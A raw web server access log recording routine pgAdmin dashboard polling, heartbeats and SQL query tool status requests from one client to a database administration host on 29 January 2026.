"https://db.profibot.hu/browser/" +[29/Jan/2026:15:14:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:14:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:15:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:15:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:16:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:16:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:16:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:17:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:17:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:33 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:18:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:47 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:47 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:52 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:53 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:54 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 256] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:54 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:19:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:19:59 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:20:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:21:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:21:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:21:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:22:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:22:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:23:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:23:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:24:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:24:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:25:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:25:54 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:38 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:38 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:15:26:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:15:26:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; 